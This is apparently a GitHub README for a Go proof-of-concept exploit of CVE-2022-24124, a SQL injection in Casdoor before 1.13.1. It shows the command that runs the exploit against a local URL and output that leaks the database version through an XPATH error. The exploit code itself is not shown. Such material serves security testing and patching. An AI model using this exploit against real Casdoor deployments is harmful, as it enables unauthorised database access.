POC for CVE-2022-24124

Exploit Code for CVE-2022-24124 aka Casdoor SQL Injection

Exploit Links: [ExploitDB-50792] [PacketStormSecurity]

Expected outcome: Dump SQL database version on host running Casdoor < 1.13.1

Intended only for educational and testing in corporate environments.

Exploit Usage

Barricade➜ go run exploit.go -u http://127.0.0.1:8080

-=Casdoor SQL Injection (CVE-2022-24124)=-
- by Mayank Deshmukh (ColdFusionX)

[*] Dumping Database Version
XPATH syntax error: .12-MariaDB-0+deb11u1

About

POC for CVE-2022-24124

exploit casdoor sqlinjection sqli

MIT License

Languages

Language:Go 100.0%